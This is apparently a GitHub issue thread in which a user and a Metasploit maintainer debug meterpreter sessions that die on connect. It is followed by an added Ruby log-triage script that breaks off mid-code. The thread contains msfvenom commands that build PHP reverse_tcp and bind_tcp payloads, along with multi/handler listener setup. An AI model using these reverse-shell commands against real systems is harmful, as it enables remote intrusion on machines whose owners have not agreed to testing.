1.
msfvenom -p php/meterpreter_reverse_tcp LHOST=MY IP LPORT=8888 -f raw
but I also tried:
msfvenom -p php/meterpreter/reverse_tcp LHOST=MY IP LPORT=8888 -f raw
and a lot of other payloads and different ports, but none of them work, even with the o option to php. Same issue each time.
2.
use exploit/multi/handler
set payload php/meterpreter_reverse_tcp
set LHOST MY iP
set LPORT 8888
exploit
The ports are actually open; I've double-checked that.
The meterpreter should open and stay open
[*] Started reverse TCP handler on MYIP:8888
[*] IP - Meterpreter session 1 closed. Reason: Died
[*] Meterpreter session 1 opened (MYIP:8888 -> IP:49257) at 2020-09-09 10:38:53 -0400
Framework: 5.0.101-dev
Console : 5.0.101-dev
This issue appears with all the payloads and targets and every port.
===8<=== CUT AND PASTE EVERYTHING BELOW THIS LINE ===8<===
The following global/module datastore, and database setup was configured before the issue occurred:
[framework/ui/console]
ActiveModule=exploit/multi/handler
[multi/handler]
PAYLOAD=php/meterpreter_reverse_tcp
WORKSPACE=
VERBOSE=false
WfsDelay=0
EnableContextEncoding=false
ContextInformationFile=
DisablePayloadHandler=false
ExitOnSession=true
ListenerTimeout=0
LPORT=8888
LHOST=MY IP
ReverseListenerBindPort=
ReverseAllowProxy=false
ReverseListenerComm=
ReverseListenerBindAddress=
ReverseListenerThreaded=false
StagerRetryCount=10
StagerRetryWait=5
PayloadUUIDSeed=
PayloadUUIDRaw=
PayloadUUIDName=
PayloadUUIDTracking=false
AutoLoadStdapi=true
AutoVerifySession=true
AutoVerifySessionTimeout=30
InitialAutoRunScript=
AutoRunScript=
AutoSystemInfo=true
EnableUnicodeEncoding=false
HandlerSSLCert=
SessionRetryTotal=3600
SessionRetryWait=10
SessionExpirationTimeout=604800
SessionCommunicationTimeout=300
PayloadProcessCommandLine=
AutoUnhookProcess=false
The following commands were ran during the session and before this issue occurred:
187 use exploit/multi/handler
188 set payload php/meterpreter_reverse_tcp
189 set LPORT 8888
190 set LHOST MY IP
191 show options
192 exploit
193 version
194 debug
The following errors occurred before the issue occurred:
[09/09/2020 10:36:19] [e(0)] core: Msf::OptionValidateError : One or more options failed to validate: LHOST.
/usr/share/metasploit-framework/lib/msf/core/module/options.rb:21:in `validate'
/usr/share/metasploit-framework/lib/msf/core/encoded_payload.rb:64:in `generate'
/usr/share/metasploit-framework/lib/msf/core/encoded_payload.rb:25:in `create'
/usr/share/metasploit-framework/lib/msf/base/simple/payload.rb:53:in `generate_simple'
/usr/share/metasploit-framework/lib/msf/base/simple/payload.rb:140:in `generate_simple'
/usr/share/metasploit-framework/lib/msf/core/payload_generator.rb:473:in `generate_raw_payload'
/usr/share/metasploit-framework/lib/msf/core/payload_generator.rb:418:in `generate_payload'
/usr/bin/msfvenom:468:in `<main>'
[09/09/2020 10:36:32] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 10:36:32] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 10:36:33] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 10:36:33] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 10:37:40] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 10:37:40] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 10:37:41] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 10:37:41] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 10:44:33] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
The following logs were recorded before the issue occurred:
[09/07/2020 12:27:08] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/07/2020 12:27:08] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/07/2020 12:27:08] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/07/2020 12:28:10] [e(0)] core: Exception encountered in cmd_set - Msf::OptionValidateError The following options failed to validate: Value 'wg-quick down wg0' is not valid for option 'LHOST'.
[09/07/2020 12:28:48] [e(0)] core: Exploit failed (multi/script/web_delivery) - Msf::IncompatiblePayloadError An exploitation error occurred.
[09/07/2020 12:30:43] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/07/2020 12:30:43] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/07/2020 12:30:43] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/07/2020 12:30:43] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/07/2020 12:41:06] [e(0)] core: Exploit failed (multi/script/web_delivery): Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444). - Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
[09/09/2020 08:30:34] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 08:30:34] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 08:30:34] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 08:30:34] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 08:34:09] [e(0)] core: Session with no session_host/target_host/tunnel_peer. Session Info: #<Session:meterpreter 127.0.0.1 () >
[09/09/2020 08:34:10] [e(0)] core: Session with no session_host/target_host/tunnel_peer. Session Info: #<Session:meterpreter 127.0.0.1 () >
[09/09/2020 08:34:10] [w(0)] core: Session 1 has died
[09/09/2020 08:34:13] [w(0)] core: Exception in scheduler thread Rex::TimeoutError Operation timed out.
[09/09/2020 09:01:04] [e(0)] core: Session with no session_host/target_host/tunnel_peer. Session Info: #<Session:meterpreter 127.0.0.1 () >
[09/09/2020 09:01:05] [e(0)] core: Session with no session_host/target_host/tunnel_peer. Session Info: #<Session:meterpreter 127.0.0.1 () >
[09/09/2020 09:01:05] [w(0)] core: Session 2 has died
[09/09/2020 09:01:05] [w(0)] core: Exception in scheduler thread Rex::TimeoutError Operation timed out.
[09/09/2020 10:34:48] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 10:34:48] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 10:34:49] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 10:34:49] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 10:36:18] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 10:36:18] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 10:36:19] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 10:36:19] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 10:36:19] [e(0)] core: Msf::OptionValidateError : One or more options failed to validate: LHOST.
/usr/share/metasploit-framework/lib/msf/core/module/options.rb:21:in `validate'
/usr/share/metasploit-framework/lib/msf/core/encoded_payload.rb:64:in `generate'
/usr/share/metasploit-framework/lib/msf/core/encoded_payload.rb:25:in `create'
/usr/share/metasploit-framework/lib/msf/base/simple/payload.rb:53:in `generate_simple'
/usr/share/metasploit-framework/lib/msf/base/simple/payload.rb:140:in `generate_simple'
/usr/share/metasploit-framework/lib/msf/core/payload_generator.rb:473:in `generate_raw_payload'
/usr/share/metasploit-framework/lib/msf/core/payload_generator.rb:418:in `generate_payload'
/usr/bin/msfvenom:468:in `<main>'
[09/09/2020 10:36:32] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 10:36:32] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 10:36:33] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 10:36:33] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 10:37:40] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 10:37:40] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 10:37:41] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 10:37:41] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 10:38:53] [w(0)] core: Session 1 has died
[09/09/2020 10:38:54] [w(0)] core: Exception in scheduler thread Rex::TimeoutError Operation timed out.
[09/09/2020 10:44:33] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
The versions and install method of your Metasploit setup:
Framework: 5.0.101-dev
Ruby: ruby 2.7.1p83 (2020-03-31 revision a0c7c23c9c) [i386-linux-gnu]
Install Root: /usr/share/metasploit-framework
Session Type: Connected to msf. Connection type: postgresql. Connection name: #<Msf::DBManager:0x05ac0684>.
Install Method: Other - Please specify
I run Metasploit on Kali on a virtual machine (VMware).
When you run LHOST=MY IP, are you actually replacing the value MY IP with your local host's IP address? Also is this an IP address the other machine can reach? Your log output suggests you are using the literal value MY IP in some places.
Also can you confirm if you are only using the PHP Meterpreter payloads or if this is also occurring for you with other payloads such as windows/x64/meterpreter/reverse_tcp or similar? Just want to check if this is a config issue on your side and eliminate some possibilities as whilst my gut feeling says this is a PHP Meterpreter issue, I want to double check you aren't also getting the same issue with other payloads.
Yes, MY IP = my local IP address.
Yes, this is an IP reachable by other machines, and the ports are actually open; checked with https://canyouseeme.org/ and Nmap.
Yes, I tried with other payloads, like Linux ones for a reverse TCP and a bind TCP; same issue with all payloads, even with exploit/multi/script/web_delivery.
------- Original Message -------
On Wednesday, September 9, 2020 6:39 PM, Grant Willcox notifications@github.com wrote:
When you run LHOST=MY IP, are you actually replacing the value MY IP with your local host's IP address? Also is this an IP address the other machine can reach?
Also can you confirm if you are only using the PHP Meterpreter payloads or if this is also occurring for you with other payloads such as windows/x64/meterpreter/reverse_tcp or similar? Just want to check if this is a config issue on your side and eliminate some possibilities as whilst my gut feeling says this is a PHP Meterpreter issue, I want to double check you aren't also getting the same issue with other payloads.
Okay so local IP addresses should not be accessible to other people via tools such as http://canyouseeme.org/ so I'm a little confused by that statement.
The fact that it's closing on every payload is unusual though, is there any AV running on the system you are targeting?
Yes, in fact when I say MY IP I mean my VPN IP (through WireGuard, if that can help you).
And no, there is no AV on my side or on his side.
Do you want me to post my logs for other payloads and different ports, or would this be useless?
If you could I'd like to see what you've tried and what's going on a little bit more. The VPN could potentially be an issue but I'd hope not. Though given that from what you are describing it's affecting multiple modules I am a little confused. I'm also curious if checking out the 6.x branch that's on GitHub would help you at all if it's a known issue that we fixed in a recent release.
No, unfortunately. I searched everywhere on GitHub for 7 days before contacting you, to see if someone had the same issue, but found nothing helpful. I've also checked the documentation for this kind of issue provided by Rapid7, but nothing works.
I will test other payloads and send you the log content here. Give me 30 minutes and I'll give you that.
msfvenom -p php/meterpreter/bind_tcp LHOST=MYIP LPORT=8888 -f raw > /home/MYPC/Desktop/exploittestnew1.php
use exploit/multi/handler
set LHOST MYIP
set LPORT 8888
exploit
OUTPUT:
[*] Started reverse TCP handler on 0.0.0.0:8888
[*] Command shell session 1 opened (IP:8888 -> IP:56410) at 2020-09-09 14:21:34 -0400
[*] 52.202.215.126 - Command shell session 1 closed.
===8<=== CUT AND PASTE EVERYTHING BELOW THIS LINE ===8<===
The following global/module datastore, and database setup was configured before the issue occurred:
[framework/ui/console]
ActiveModule=exploit/multi/handler
[multi/handler]
PAYLOAD=generic/shell_reverse_tcp
WORKSPACE=
VERBOSE=false
WfsDelay=0
EnableContextEncoding=false
ContextInformationFile=
DisablePayloadHandler=false
ExitOnSession=true
ListenerTimeout=0
LHOST=MY VPN IP
LPORT=8888
The following commands were ran during the session and before this issue occurred:
214 use exploit/multi/handler
215 set LHOST MY VPN IP
216 set LPORT 8888
217 exploit
218 debug
The following errors occurred before the issue occurred:
[09/09/2020 14:18:42] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:18:42] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:18:43] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 14:18:43] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 14:19:16] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:19:16] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:19:18] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 14:19:18] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 14:21:35] [e(0)] core: Exception raised from handle_connection - EOFError EOFError
[09/09/2020 14:22:49] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
The following logs were recorded before the issue occurred:
[09/09/2020 10:37:40] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 10:37:40] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 10:37:41] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 10:37:41] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 10:38:53] [w(0)] core: Session 1 has died
[09/09/2020 10:38:54] [w(0)] core: Exception in scheduler thread Rex::TimeoutError Operation timed out.
[09/09/2020 10:44:33] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[09/09/2020 13:12:47] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 13:12:47] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 13:12:49] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 13:12:49] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 13:15:25] [w(0)] core: Session 1 has died
[09/09/2020 13:15:29] [w(0)] core: Exception in scheduler thread Rex::TimeoutError Operation timed out.
[09/09/2020 13:15:51] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[09/09/2020 13:57:45] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 13:57:45] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 13:57:46] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 13:57:46] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 13:58:44] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 13:58:44] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 13:58:44] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 13:58:45] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 14:00:38] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:00:38] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:00:40] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 14:00:40] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 14:02:12] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:02:12] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:02:13] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 14:02:13] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 14:03:29] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[09/09/2020 14:07:05] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:07:05] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:07:06] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 14:07:06] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 14:09:11] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:09:11] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:09:13] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 14:09:13] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 14:13:39] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[09/09/2020 14:18:42] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:18:42] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:18:43] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 14:18:43] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 14:19:16] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:19:16] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:19:18] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 14:19:18] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 14:21:35] [e(0)] core: Exception raised from handle_connection - EOFError EOFError
[09/09/2020 14:22:49] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
The versions and install method of your Metasploit setup:
Framework: 5.0.101-dev
Ruby: ruby 2.7.1p83 (2020-03-31 revision a0c7c23c9c) [i386-linux-gnu]
Install Root: /usr/share/metasploit-framework
Session Type: Connected to msf. Connection type: postgresql. Connection name: #<Msf::DBManager:0x05e8227c>.
Install Method: Other - Please specify
msfvenom -p php/meterpreter/bind_tcp LHOST=MYIP LPORT=4444 -f raw > /home/MYCOMPUTERNAME/Desktop/TEST2.php
use exploit/multi/handler
set LHOST MYIP
set LPORT 4444
exploit
===8<=== CUT AND PASTE EVERYTHING BELOW THIS LINE ===8<===
The following global/module datastore, and database setup was configured before the issue occurred:
[framework/ui/console]
ActiveModule=exploit/multi/handler
[multi/handler]
PAYLOAD=generic/shell_reverse_tcp
WORKSPACE=
VERBOSE=false
WfsDelay=0
EnableContextEncoding=false
ContextInformationFile=
DisablePayloadHandler=false
ExitOnSession=true
ListenerTimeout=0
LHOST=MY VPN IP
LPORT=4444
The following commands were ran during the session and before this issue occurred:
230 use exploit/multi/handler
231 set LHOST MY VPN IP
232 set LPORT 4444
233 exploit
234 debug
The following errors occurred before the issue occurred:
[09/09/2020 14:30:49] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:30:49] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:30:52] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 14:30:52] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 14:30:58] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:30:58] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:30:59] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 14:30:59] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 14:31:58] [e(0)] core: Exception raised from handle_connection - EOFError EOFError
[09/09/2020 14:32:04] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
The following logs were recorded before the issue occurred:
[09/09/2020 14:00:40] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 14:00:40] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 14:02:12] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:02:12] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:02:13] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 14:02:13] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 14:03:29] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[09/09/2020 14:07:05] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:07:05] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:07:06] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 14:07:06] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 14:09:11] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:09:11] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:09:13] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 14:09:13] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 14:13:39] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[09/09/2020 14:18:42] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:18:42] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:18:43] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 14:18:43] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 14:19:16] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:19:16] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:19:18] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 14:19:18] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 14:21:35] [e(0)] core: Exception raised from handle_connection - EOFError EOFError
[09/09/2020 14:22:49] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[09/09/2020 14:26:38] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:26:38] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:26:40] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 14:26:40] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 14:26:52] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:26:52] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:26:53] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 14:26:53] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 14:27:46] [e(0)] core: Exploit failed (multi/handler): Errno::EACCES Permission denied - bind(2) for 0.0.0.0:444 - Errno::EACCES Permission denied - bind(2) for 0.0.0.0:444
[09/09/2020 14:28:56] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:28:56] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:28:59] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 14:28:59] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 14:29:37] [e(0)] core: Exploit failed (multi/handler): Errno::EACCES Permission denied - bind(2) for 0.0.0.0:444 - Errno::EACCES Permission denied - bind(2) for 0.0.0.0:444
[09/09/2020 14:30:49] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:30:49] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:30:52] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 14:30:52] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 14:30:58] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:30:58] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/09/2020 14:30:59] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/09/2020 14:30:59] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/09/2020 14:31:58] [e(0)] core: Exception raised from handle_connection - EOFError EOFError
[09/09/2020 14:32:04] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
The versions and install method of your Metasploit setup:
Framework: 5.0.101-dev
Ruby: ruby 2.7.1p83 (2020-03-31 revision a0c7c23c9c) [i386-linux-gnu]
Install Root: /usr/share/metasploit-framework
Session Type: Connected to msf. Connection type: postgresql. Connection name: #<Msf::DBManager:0x0602ff20>.
Install Method: Other - Please specify
Unfortunately I don't have a Linux machine or a Windows machine, so I can't post the output for those payloads for now.
I think the problem comes from the wg0 interface, which Metasploit couldn't handle, but I'm not sure.
Hmm so there is this that I see:
[09/09/2020 14:29:37] [e(0)] core: Exploit failed (multi/handler): Errno::EACCES Permission denied - bind(2) for 0.0.0.0:444 - Errno::EACCES Permission denied - bind(2) for 0.0.0.0:444
It's possible you aren't running it with enough permissions for the bind handler to be created?
I also see these errors which are interesting:
[09/09/2020 14:21:35] [e(0)] core: Exception raised from handle_connection - EOFError EOFError
and more specifically this one:
[09/09/2020 13:15:25] [w(0)] core: Session 1 has died
[09/09/2020 13:15:29] [w(0)] core: Exception in scheduler thread Rex::TimeoutError Operation timed out.
Not seen those before but they seem related to what is going on here. Shame that it doesn't seem to include the line number and file they are occurring in.
Any chance you could run setg LogLevel 3 and then try it again, then post the last 1000 lines or so of your logs at ~/.msf4/logs/framework.log? Hopefully we can get some line numbers and file names for the offending files and start tracking this down.
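One way to pull the distinct errors out of a framework.log like the ones posted in this thread, as an added example that is not part of the original discussion and is not Metasploit code. The names `parse_line`, `normalize`, `note_for` and `triage` are hypothetical, and the sample is assembled from lines posted above.

```ruby
# Added example: triage of framework.log lines. It drops the recurring
# "Dependency for ... is not supported" noise, groups repeats, attaches stack
# frames to the entry they follow, and annotates bind(2) EACCES failures.

# Sample assembled from log lines posted in this thread.
SAMPLE_LOG = <<~'LOG'
  [09/09/2020 10:36:19] [e(0)] core: Msf::OptionValidateError : One or more options failed to validate: LHOST.
  /usr/share/metasploit-framework/lib/msf/core/module/options.rb:21:in `validate'
  /usr/share/metasploit-framework/lib/msf/core/encoded_payload.rb:64:in `generate'
  [09/09/2020 10:36:32] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
  [09/09/2020 10:36:33] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
  [09/09/2020 10:38:53] [w(0)] core: Session 1 has died
  [09/09/2020 10:38:54] [w(0)] core: Exception in scheduler thread Rex::TimeoutError Operation timed out.
  [09/09/2020 13:15:25] [w(0)] core: Session 1 has died
  [09/09/2020 14:21:35] [e(0)] core: Exception raised from handle_connection - EOFError EOFError
  [09/09/2020 14:27:46] [e(0)] core: Exploit failed (multi/handler): Errno::EACCES Permission denied - bind(2) for 0.0.0.0:444 - Errno::EACCES Permission denied - bind(2) for 0.0.0.0:444
  [09/09/2020 14:29:37] [e(0)] core: Exploit failed (multi/handler): Errno::EACCES Permission denied - bind(2) for 0.0.0.0:444 - Errno::EACCES Permission denied - bind(2) for 0.0.0.0:444
  [09/09/2020 14:31:58] [e(0)] core: Exception raised from handle_connection - EOFError EOFError
  [09/09/2020 17:00:21] [d(3)] core: Checking compat [windows/x64/vncinject/bind_tcp with multi/handler]: reverse to bind
LOG

# "[MM/DD/YYYY HH:MM:SS] [<level letter>(<verbosity>)] <source>: <message>"
ENTRY = /\A\[(\d{2}\/\d{2}\/\d{4} \d{2}:\d{2}:\d{2})\] \[([a-z])\((\d+)\)\] (\w+): (.*)\z/
NOISE = /\ADependency for \S+ is not supported\z/
LEVELS = { 'e' => :error, 'w' => :warning, 'd' => :debug }.freeze

# Parse one line; returns nil for continuation lines such as stack frames.
def parse_line(line)
  m = ENTRY.match(line.chomp)
  return nil unless m

  { time: m[1], level: LEVELS.fetch(m[2], :other), verbosity: m[3].to_i,
    source: m[4], message: m[5] }
end

# Collapse the "X - X" repetition and session numbers so repeats group together.
def normalize(message)
  message.sub(/\A(.+?): (.+) - \2\z/, '\1: \2').gsub(/\bSession \d+\b/, 'Session N')
end

# Annotate a bind(2) permission failure on a port below 1024.
def note_for(message)
  m = /Errno::EACCES .*bind\(2\) for \S+:(\d+)/.match(message)
  return nil unless m && m[1].to_i < 1024

  "port #{m[1]} is below 1024; on Linux, binding it needs root or " \
    'CAP_NET_BIND_SERVICE by default'
end

# Returns one hash per distinct message, in first-seen order.
def triage(text, levels: %i[error warning])
  groups = {}
  last = nil
  text.each_line do |line|
    entry = parse_line(line)
    if entry.nil?
      # Stack frame or blank line: count it against the entry it follows.
      last[:trace_lines] += 1 if last && !line.strip.empty?
      next
    end
    last = nil
    next if entry[:message].match?(NOISE) || !levels.include?(entry[:level])

    message = normalize(entry[:message])
    last = groups[[entry[:level], message]] ||= {
      level: entry[:level], message: message, count: 0,
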